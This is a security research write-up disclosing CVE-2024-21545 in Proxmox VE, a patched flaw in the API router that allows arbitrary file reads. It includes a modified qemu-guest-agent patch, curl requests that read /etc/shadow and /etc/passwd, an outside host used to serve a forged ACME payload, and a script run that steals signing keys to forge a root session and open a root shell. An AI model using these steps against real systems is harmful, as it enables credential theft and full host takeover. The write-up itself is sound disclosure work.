Proxmox VE CVE-2024-21545 - Tricking the API into giving you the keys

During some recent research in Security Labs, we identified CVE-2024-21545 in Proxmox VE 8.2.2. This can allow an authenticated attacker to fully take over the target system, starting with a relatively limited permission set. Keep reading to go on a journey of discovery, exploitation, and variant analysis to find the two exploitation vectors for the same root cause.

Proxmox fixed this vulnerability on 23rd Sept 2024 as part of their normal release cycle; their advisory is available here. They also identified that this vulnerability impacted Proxmox Mail Gateway, which was similarly fixed.

What is Proxmox VE?

In their own words:

“Proxmox Virtual Environment is a complete, open source server management platform for enterprise virtualization. It tightly integrates the KVM hypervisor and Linux Containers (LXC), software-defined storage, and networking functionality, on a single platform. With the integrated web-based user interface you can manage VMs and containers, high availability for clusters, or the integrated disaster recovery tools with ease.” - proxmox.com

API Handlers

As with most research projects, this one started with a healthy dose of code review. This time it was Perl. After installing a test system in a virtual machine and logging in, I identified the source code location as /usr/share/perl5/PVE and downloaded a copy. I later found that the code is open source, and I could have saved myself entire minutes.

My first aim in looking at the code was to identify how API requests are handled and dispatched, and how the permissioning system works. Proxmox has a pretty granular RBAC system which can be configured to give specific permissions over specific resources to specific users or groups. For example, to start a VM you need the VM.PowerMgmt permission over the /vms/{vmid} path, or some parent path.
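
To make the "or some parent path" rule concrete, here is a minimal Python sketch of a path-based permission lookup. It is a simplified model for illustration only: the `acl` table, its layout, and the `has_permission` helper are hypothetical, and the real Proxmox RBAC implementation handles details this article does not cover.

```python
def has_permission(acl, user, path, privilege):
    """Return True if `user` holds `privilege` on `path` or on any parent path."""
    parts = [p for p in path.split("/") if p]
    # Check the most specific path first, then walk up towards the root "/".
    for depth in range(len(parts), -1, -1):
        candidate = "/" + "/".join(parts[:depth])
        if privilege in acl.get((user, candidate), set()):
            return True
    return False


# Hypothetical ACL table: (user, path) -> set of privileges.
acl = {
    ("alice@pve", "/vms/102"): {"VM.PowerMgmt"},
    ("bob@pve", "/vms"): {"VM.PowerMgmt"},
}
```

In this model, alice@pve can start VM 102 only, while bob@pve can start any VM because the grant sits on the parent path /vms.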

Each API endpoint is defined using a hash of various items, including a description, the function to be executed, and additional parameters like the permissions. Following the example above, the API handler for the VM start endpoint is defined as follows:

__PACKAGE__->register_method({
    name => 'vm_start',
    path => '{vmid}/status/start',
    method => 'POST',
    protected => 1,
    proxyto => 'node',
    description => "Start virtual machine.",
    permissions => {
      check => ['perm', '/vms/{vmid}', [ 'VM.PowerMgmt' ]],
    },
    parameters => {
      additionalProperties => 0,
      properties => {
        node => get_standard_option('pve-node'),
        vmid => get_standard_option('pve-vmid',
          { completion => \&PVE::QemuServer::complete_vmid_stopped }),
        [snipped]
        timeout => {
          description => "Wait maximal timeout seconds.",
          type => 'integer',
          minimum => 0,
          default => 'max(30, vm memory in GiB)',
          optional => 1,
        },
      },
    },
    returns => {
      type => 'string',
    },
    code => sub {
      [snipped]
    }});

Some of these parameters are not important to us or will be discussed later, but the key parameters we can see include the path the request handler handles, the permissions check showing the VM.PowerMgmt we outlined earlier, the request parameters with the (annoyingly effective) validation, and finally the actual code function to be executed (snipped here because it’s pretty long). Most of this information is helpfully exposed via the Proxmox API documentation page which proved very handy for building valid requests to call the endpoints.

All the API endpoints supported by the service are registered similarly to the above, and for each request that the server receives, the appropriate handler is selected and executed. This occurs in the function handle_api2_request.

Reading Arbitrary Files?

When reading this specific function I noticed something potentially interesting:

sub handle_api2_request {
  my ($self, $reqstate, $auth, $method, $path, $upload_state) = @_;

[snipped]
    my $res = $self->rest_handler($clientip, $method, $rel_uri, $auth, $params, $format); # <-- 1
[snipped]
    my $download = $res->{download};
    $download //= $res->{data}->{download} # <-- 2
      if defined($res->{data}) && ref($res->{data}) eq 'HASH';
    if (defined($download)) {
      send_file_start($self, $reqstate, $download); # <-- 3
      return;
    }
[snipped]
}

At item 1 in the above code block, we can see the entry point for the specific API handler for the request that has been received. This is dynamically dispatched based on the request and references the registered methods like those we have already seen. At item 2 we see that the return object from this function is being inspected for either a ‘download’ or ‘data->download’ sub-object. Finally, at item 3 we can see this object being used to send a file to the API client based on the contents of the download object.

I also did some additional code review wherein I identified the format expected by the send_file_start function.

If the response from the API handler carries an object with the following layout at either of the two locations checked above (‘download’ or ‘data->download’), the server will read an arbitrary file from the system and send it to the client.

{
  "download": {
    "path": "/etc/shadow",
    "content-type": "text/plain"
  }
}

The path in the example here somewhat gives it away, but as we will see soon, we can read privileged files such as /etc/shadow, as well as more interesting files.
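
The router logic described above can be modeled in a few lines of Python. This is a sketch of the behavior, not the Perl implementation: `pick_download`, `respond`, and the `read_file` callback are illustrative names that do not appear in Proxmox.

```python
def pick_download(res):
    """Mirror the two lookups in handle_api2_request: res.download, then res.data.download."""
    download = res.get("download")
    data = res.get("data")
    if download is None and isinstance(data, dict):
        download = data.get("download")
    return download


def respond(res, read_file):
    """Return file contents if a download object is present, else the normal data."""
    download = pick_download(res)
    if download is not None:
        # The router trusts whatever path it finds in the handler's result.
        return read_file(download["path"])
    return res.get("data")
```

The point of the model is that nothing in this path asks whether the endpoint was ever meant to serve files; any handler whose result can be shaped by an attacker becomes a file-read primitive.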

Finding Control

We’ve now identified a potential method to read arbitrary files from the file system but, unfortunately, it’s not that simple. Though we’ve found a potential vector, we still need to find a way to control the response object from the API handler to insert the ‘download’ key.

It would take a LOT of time to go through all the code in the numerous API endpoints in this system to identify the ones in which we could achieve this kind of control. I had to find a way to pre-filter which API endpoints I should manually look at.

I reasoned that there are two potential vectors for controlling this output. The first is a classic web application security methodology of looking for endpoints that return the data passed in as-is, after some kind of mutation, or after storage and retrieval. The second potential vector is more specific to the Proxmox system. A number of the API endpoints deal directly or indirectly with external components such as virtual machines/containers or external services like ACME for TLS certificates.

For the first methodology, I leveraged the strict request validation. (Almost) every API endpoint explicitly defines the request object it expects, and the types and formats for every key/value passed. If any inputs violate these rules, the request is rejected before onward processing. This allows us to filter the API endpoints based on those that will receive an object that looks similar to the desired output.

There is an additional wrinkle here, which is the reason for my ‘(almost) every API endpoint’: one optional parameter an API handler can pass is additionalProperties. If passed and true, this parameter signifies to the request validator that additional parameters are allowed even where they are not explicitly enumerated in the request definition. To search for these two constraints, we first need to get a dump of the API. Conveniently, the API handler provides an api_dump function we can call to export all of the endpoint definitions:

use PVE::API2;
use PVE::RESTHandler;
use JSON;
my $JSON = JSON->new->utf8;
$JSON->allow_unknown(1);
$JSON->allow_blessed(1);

print $JSON->encode(PVE::RESTHandler::api_dump(PVE::API2));

This gives us a nice JSON blob that contains all of the definitions we need, such as the following for the ‘start’ endpoint we saw earlier:

{
  "info": {
    "POST": {
      "permissions": {
        "check": ["perm", "/vms/{vmid}", ["VM.PowerMgmt"]]
      },
      "method": "POST",
      "name": "vm_start",
      "returns": {"type": "string"},
      "description": "Start virtual machine.",
      "proxyto": "node",
      "parameters": {
        "properties": {
          "node": {
            "type": "string",
            "typetext": "<string>",
            "description": "The cluster node name.",
            "format": "pve-node"
          },
[snipped]
        },
        "additionalProperties": 0
      },
      "protected": 1,
      "allowtoken": 1
    }
  },
  "leaf": 1,
  "text": "start",
  "path": "/nodes/{node}/qemu/{vmid}/status/start"
}

This is essentially the same information we saw at the start but this time it’s easy to throw together some Python to filter out what we want. We can now filter based on the return type (we need an object or we can’t include the ‘download’ parameters), the properties (if it includes a ‘download’ input, it might be worth looking for a ‘download’ in the output), and the additionalProperties flag we discussed earlier.
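
A filter along these lines might look like the following Python sketch. It is not the script used during the research: the helper names are made up, the way the three criteria are combined is one plausible reading of the description above, and the "children" key for nested nodes is an assumption about the dump layout that the excerpt above does not show.

```python
def walk(nodes):
    """Yield (path, http_method, definition) for every endpoint in the dump tree."""
    for node in nodes:
        for http_method, definition in node.get("info", {}).items():
            yield node["path"], http_method, definition
        # Assumption: non-leaf nodes list their sub-paths under "children".
        yield from walk(node.get("children", []))


def is_candidate(definition):
    """Keep endpoints that return an object and accept 'download' or arbitrary extra input."""
    returns = definition.get("returns") or {}
    params = definition.get("parameters") or {}
    returns_object = returns.get("type") == "object"
    takes_download = "download" in (params.get("properties") or {})
    open_params = bool(params.get("additionalProperties"))
    return returns_object and (takes_download or open_params)


def candidates(dump):
    """Return the (path, http_method) pairs worth reviewing by hand."""
    return [(path, method) for path, method, d in walk(dump) if is_candidate(d)]
```

Given the JSON printed by the Perl snippet saved to a file, loading it with `json.load` and passing the result to `candidates` would produce the shortlist for manual review.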

Whilst some endpoints fit the criteria, they did not allow sufficient control over the response object to exploit the identified vulnerability, which unfortunately led us to a dead end.

Next, let's consider another potential way to control response bodies: requests that interact with external components or systems. There are relatively few of these, and while the definition is somewhat 'conceptual', it's easy to identify them by visually inspecting the list of requests and then analyzing them further.

Talk to my agent

One of the endpoints that immediately caught my eye was the agent/exec endpoint. Its description states that it 'Executes the given command in the vm via the guest-agent and returns an object with the pid.'

The ‘guest-agent’ is the Qemu guest agent, a service that can be installed within your virtual machines. It enables communication between the hypervisor and the guest virtual machine, facilitating tasks like obtaining guest status info (IP addresses, memory usage information, etc), and executing commands, as used by this API endpoint. The communication channel is a virtual serial port added to the virtual machine, which both the hypervisor and guest agent connect to for bidirectional communications using JSON objects.

The definition for this endpoint is below:

__PACKAGE__->register_method({
    name => 'exec',
    path => 'exec',
    method => 'POST',
    protected => 1,
    proxyto => 'node',
    description => "Executes the given command in the vm via the guest-agent and returns an object with the pid.",
    permissions => { check => [ 'perm', '/vms/{vmid}', [ 'VM.Monitor' ]]},
    parameters => [snipped],
    returns => [snipped],
    code => sub {
	my ($param) = @_;

	my $vmid = $param->{vmid};
	my $cmd = $param->{command};

	my $res = PVE::QemuServer::Agent::qemu_exec($vmid, $param->{'input-data'}, $cmd);
	return $res;
    }});

In the request handler definition above, the endpoint returns the result from the qemu_exec function without modification. By tracing this function through nested calls, we find that the value in $res corresponds to the 'return' key in the JSON object returned by the guest agent. Using this knowledge, we can look into patching qemu-ga (The Qemu guest agent binary) to determine if we can manipulate the response object and exploit the identified download vulnerability.

Modifying the send_response function in the qemu-guest-agent main.c ended up being relatively straightforward. But it's crucial to carefully select which specific responses to replace, as this function is used for all agent requests, and Proxmox may not tolerate unexpected behavior from the qemu-guest-agent during VM bootup. I addressed this by checking the normal response JSON and replacing it only when the contents included an error message. Since we’re targeting the ‘exec’ function, we can simply pass a nonexistent command, causing the guest agent to return an error message containing 'Failed to execute child process'. When this string is detected, we respond with:

{
  "return": {
    "download": {
      "path": "/etc/shadow",
      "content-type": "text/plain"
    }
  }
}

Compiling this change and executing our newly built qemu-ga binary as root inside our VM allows us to perform a valid, authenticated request against the agent/exec API endpoint, which responds with the contents of /etc/shadow.

This is good news! This means that our initial vulnerability path is exploitable in this case.

Having to re-compile the Qemu guest agent for every new file we want to steal is fiddly and slow, so we can again modify the guest agent send_response function to use the error message as a messaging channel (there are a few paths we could take for a messaging channel, but since we’re already editing this function this is the cleanest). The full error message we were using before actually includes the full path to the command we failed to execute:

{
  "error": {
    "class": "GenericError",
    "desc": "Guest agent command failed, error was 'Failed to execute child process \\u201CNOTFOUND/etc/shadow\\u201D (No such file or directory)'"
  }
}

We can use this error message as a messaging channel. By prefixing the command we want to execute with something that will never exist ('NOTFOUND' in the above example), we can then take the rest of the quoted path in the error message as our targeted file. This allows us to change which file we read without having to recompile and restart qemu-ga each time. Therefore, the actual changes we’ve made to qemu-ga are the following:

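    /* Only rewrite the response when our marker appears in the exec error. */
    const char *marker = "Failed to execute child process \\u201CNOTFOUND";
    char *path = strstr(response->str, marker);
    if (path != NULL) {
        path += strlen(marker);               /* skip to the requested file path */
        char *end = strstr(path, "\\u201D");  /* closing quote of the message */
        if (end != NULL) {
            end[0] = '\0';                    /* terminate the path in place */
            printf("%s\n", path);             /* debug: log the requested file */
            response = g_string_new("{\"return\":{\"download\":{\"path\":\"");
            g_string_append(response, path);
            g_string_append(response, "\",\"content-type\":\"text/plain\"}}}");
        }
    }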

And with that in place, we can see it in action:

$ curl -sk -XPOST -H 'CSRFPreventionToken: [snipped]' -b PVEAuthCookie=[snipped] \
 'https://proxmox.vm.lab:8006/api2/json/nodes/proxmox/qemu/102/agent/exec?command=NOTFOUND/etc/shadow'
root:$y$j9T$MKtWMbEST8Zq6UxfESBG71$larD/XwgNEdttqEpPKTmOa9ZVmKHXykdF43MaURDqS6:19940:0:99999:7:::
[snipped]

We’ve managed to successfully steal the contents of the /etc/shadow file from the Proxmox host with only the VM.Monitor permission and root access to a VM. Since the Qemu guest agent executes commands as root, VM.Monitor on its own implies root access to any VMs to which the permission is applied.
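
For readers who would rather not read C, the rewrite performed by the patched agent can be modeled in Python. This sketch works on a parsed response object rather than the serialized string the C patch scans, and `rewrite_response`, `MARKER`, and `CLOSING_QUOTE` are illustrative names only.

```python
MARKER = "Failed to execute child process \u201cNOTFOUND"
CLOSING_QUOTE = "\u201d"


def rewrite_response(response):
    """Swap an exec error for a forged 'download' reply when the marker is present."""
    desc = response.get("error", {}).get("desc", "")
    start = desc.find(MARKER)
    if start == -1:
        return response  # leave every other agent reply untouched
    start += len(MARKER)
    end = desc.find(CLOSING_QUOTE, start)
    if end == -1:
        return response  # malformed message: no closing quote
    path = desc[start:end]
    return {"return": {"download": {"path": path, "content-type": "text/plain"}}}
```

Everything between the NOTFOUND prefix and the closing quote becomes the path, which is why requesting the command NOTFOUND/etc/shadow yields /etc/shadow.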

Session Forgery

/etc/shadow makes for a nice proof of concept, but without potentially significant effort to crack the hashes (my password of ‘password’ notwithstanding), you can’t necessarily turn it into RCE. I wanted to improve this vulnerability’s impact so I went hunting for a more interesting proof of concept.

When I looked at the authentication methods during my earlier code review, I noticed that it was based on cryptography rather than values stored inside a database. This means that if we can steal the keys used to sign the session token we can log in as any user. By default, there is a root@pam user present on Proxmox with full permissions over everything, which makes for a very juicy target.

A normal Proxmox session token looks something like this:

PVE:[username]@[realm]:[hex timestamp]::[Base64 encoded signature]

Combining a session token and a CSRF token based on cryptographic signatures creates a valid session. Digging through the authentication handling code it seems that forging both tokens only requires the contents of /etc/pve/pve-www.key and /etc/pve/priv/authkey.key. Using these files, along with Perl's Digest::SHA::hmac_sha256_base64 and OpenSSL, we can generate 'forged' tokens to make API requests as any target user. As far as I can tell, there's no fundamental flaw in this authentication scheme; however, it relies on these files being readable only with root access on the host.

Fortunately, we took the time to make our arbitrary file read nice and flexible, so we could easily grab these two files. I won’t go into detail on how to specifically use these files as it’s the same existing authentication code ripped out and ported to a shell script. The output below demonstrates the end-to-end execution of this attack, beginning with reading the /etc/shadow file to confirm our attack's effectiveness. We then forge a root session by acquiring the necessary files and signing the correct data in the appropriate formats to generate new session tokens. Once we have our crafted session tokens we can use the node console functionality in the API to establish an interactive root shell.

$ sh qgalfr.sh https://proxmox.vm.lab.rorys.network:8006 lowpriv@pve password 102
Logged in as lowpriv@pve
Confirmed user has VM.Monitor on /vms(/102)?
Reading /etc/shadow...
root:$y$j9T$MKtWMbEST8Zq6UxfESBG71$larD/XwgNEdttqEpPKTmOa9ZVmKHXykdF43MaURDqS6:19940:0:99999:7:::
Forging root session...
Reading /etc/pve/priv/authkey.key...
Signing 'PVE:root@pam:66F1709D' for authentication token...
Reading /etc/pve/pve-www.key...
HMAC'ing '66F1709D:root@pam' for csrf token...
Forged session, logged in as root@pam
Opening shell session
OKroot@proxmox:~# hostname
proxmox
root@proxmox:~# id
uid=0(root) gid=0(root) groups=0(root)
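
The two strings named in the output above ('PVE:root@pam:66F1709D' and '66F1709D:root@pam') follow directly from the token layout shown earlier. The Python sketch below only reproduces that string handling and the unpadded base64 HMAC that Digest::SHA::hmac_sha256_base64 emits. It deliberately leaves out the signing step, and it treats the HMAC secret as an opaque value, because how the secret is derived from pve-www.key and how the final CSRF token is assembled are not described in this article. All function names are illustrative.

```python
import base64
import hashlib
import hmac


def ticket_plaintext(userid, timestamp):
    """Build the string that is signed for the session token."""
    return "PVE:{}:{:08X}".format(userid, timestamp)


def assemble_ticket(plaintext, signature_b64):
    """Join plaintext and signature in the PVE:[user]@[realm]:[hex ts]::[sig] layout."""
    return "{}::{}".format(plaintext, signature_b64)


def csrf_message(userid, timestamp):
    """Build the string that is HMAC'd for the CSRF token."""
    return "{:08X}:{}".format(timestamp, userid)


def hmac_sha256_base64(message, secret):
    """HMAC-SHA256 as base64 without '=' padding, as Perl's Digest::SHA emits it."""
    digest = hmac.new(secret, message.encode(), hashlib.sha256).digest()
    return base64.b64encode(digest).decode().rstrip("=")
```

With the timestamp 0x66F1709D and the user root@pam, the first and third helpers return exactly the two strings printed by the script.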

Variant Analysis

Our initial vulnerability was in the API handling code, not in any single API handler, and so far we’ve only looked at one method of exploiting this. After confirming the vulnerability is exploitable, I spent some time trying to find other endpoints that would let us exploit the vulnerability in the same way. The endpoint we have discussed so far requires the VM.Monitor permission. While this is relatively low-privileged compared to some of the other permissions available, I still wanted to get more ‘coverage’ of permissions to see if we could make this attack even more impactful.

Returning to our original criteria, we can easily identify our next target: /cluster/acme/meta. This endpoint retrieves ACME Directory Meta Information. Examining the code, we once again observe that it directly returns the object from a library function:

code => sub {
  my ($param) = @_;

  my $directory = extract_param($param, 'directory') // $acme_default_directory_url;

  my $acme = PVE::ACME->new(undef, $directory);
  my $meta = $acme->get_meta();

  return $meta;
}

Following the control flow, we see that this code path performs a GET request to the URL provided in the directory parameter, and returns the value in the ‘meta’ key in the response object retrieved from the URL. This is almost the same as what we saw earlier, but with ‘meta’ rather than ‘return’. Fortunately, a proof of concept for this is quick to create. The only real requirement is that the URL being requested has a valid HTTPS certificate. I chose to use httpbingo.org in this proof of concept, as it’s a simple service that can be asked to return a JSON blob passed in via the URL. This minimizes the amount of infrastructure I need to create to validate the concept. The request below shows the service returning our payload:

$ curl https://httpbingo.org/base64/decode/eyJtZXRhIjp7ImRvd25sb2FkIjp7InBhdGgiOiIvZXRjL3Bhc3N3ZCIsImNvbnRlbnQtdHlwZSI6InRleHQvcGxhaW4ifX19Cg%3d%3d
{"meta":{"download":{"path":"/etc/passwd","content-type":"text/plain"}}}
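
The base64 blob in that URL is simply the JSON payload followed by a newline. As a convenience, the following Python sketch rebuilds the URL for any target path; `build_directory_url` is a hypothetical helper, and it assumes the decode endpoint keeps behaving as shown in the request above.

```python
import base64
import json
from urllib.parse import quote


def build_directory_url(path, base="https://httpbingo.org/base64/decode/"):
    """Return a URL whose response body is a fake ACME directory with a 'download' meta."""
    payload = {"meta": {"download": {"path": path, "content-type": "text/plain"}}}
    # Compact separators plus a trailing newline reproduce the blob used above.
    body = json.dumps(payload, separators=(",", ":")) + "\n"
    token = base64.b64encode(body.encode()).decode()
    # Percent-encode the '=' padding (and any '/' or '+') for use in a URL.
    return base + quote(token, safe="")
```

For /etc/passwd this yields the same token as above, with the padding encoded as %3D%3D rather than %3d%3d; percent-encoding is case-insensitive, so the two forms are equivalent.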

We can see this in action against the cluster/acme/meta endpoint below:

$ curl -sk -H 'CSRFPreventionToken: [snipped]' -b PVEAuthCookie=[snipped] \
'https://proxmox.vm.lab:8006/api2/json/cluster/acme/meta?directory=https://httpbingo.org/base64/decode/eyJtZXRhIjp7ImRvd25sb2FkIjp7InBhdGgiOiIvZXRjL3Bhc3N3ZCIsImNvbnRlbnQtdHlwZSI6InRleHQvcGxhaW4ifX19Cg%3d%3d'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
[snipped]

This output shows that we’ve identified another vector for our same root cause vulnerability, this time needing the Sys.Audit permission rather than VM.Monitor from before. This is arguably a higher privilege permission, but still should not provide this level of access.

Privilege Separation

You will notice in the above proof of concept we only read the /etc/passwd file, rather than the /etc/shadow file of our first proof of concept. Trying to read /etc/shadow confused me for a while until I dug further into the request handling code. Going back to our API endpoint definitions, there is one parameter that quite significantly changes the impact of this vulnerability: the protected parameter.

In short, Proxmox API endpoints are either marked as ‘protected’, or not. If an API endpoint is not marked as protected, as in the case of the /cluster/acme/meta endpoint, it will be executed inside the server process pveproxy, which is listening on the exposed port. This process is running as the www-data user and cannot read sensitive files such as /etc/shadow, or the authentication keys we used earlier. This means that the impact of this specific instance is very limited, and can only really be used to steal log data or VM configuration files.

On the other hand, if an API endpoint is marked as protected, as the agent/exec endpoint from earlier was, this request will be proxied to a second server process pvedaemon, which is only accessible locally to the Proxmox machine. This process is running as root, and therefore when we exploit our first proof of concept the file read is also executing as root, resulting in our ability to read privileged files such as /etc/shadow and the authentication keys. I found this to be a very interesting privilege separation method, as it allows for lower and higher privilege actions to be executed relatively transparently, without requiring all code to be running with higher privileges.

Conclusion

During this research project, we pinpointed a potential root cause for a vulnerability within the high-level API handling code that processes all requests. We then used our exploitation requirements to systematically search through all of the API endpoints and identify promising targets. Filtering what gadgets we need to exploit a specific vulnerability can drastically reduce the amount of manual work, especially the manual code review required to find a successful exploitation path.

The main takeaway from this project is that sometimes you need to read a lot of code ‘around’ where vulnerabilities normally occur (such as directly in an API endpoint handler) to find the vulnerabilities. API request routers themselves are often ignored as part of the background but we have shown that they can sometimes themselves be exploited, using what would otherwise appear to be innocuous functionality (who cares if you can partially control a JSON response from an API?).

To fix this, the Proxmox team explicitly marked those API endpoints that are expected to be able to trigger file downloads. This significantly reduces the potential attack surface of the request router: endpoints that are not designated for file downloads can no longer trigger one by controlling their response data, effectively mitigating this vulnerability. Shout out to the Proxmox team for responding quickly to our report and having a working patch in just a few days.
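
In terms of router logic, the fix amounts to an allow-list check before any download object is honored. The Python sketch below models that idea only. It is not the actual patch, and the `download_allowed` key is a hypothetical flag name chosen for illustration.

```python
def pick_download_patched(method_def, res):
    """Only honor a 'download' object when the endpoint is explicitly marked for it."""
    # "download_allowed" is a hypothetical flag name used for illustration.
    if not method_def.get("download_allowed"):
        return None
    download = res.get("download")
    data = res.get("data")
    if download is None and isinstance(data, dict):
        download = data.get("download")
    return download
```

Under this model, a forged reply coming back through agent/exec or cluster/acme/meta is treated as ordinary response data, because neither endpoint carries the flag.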
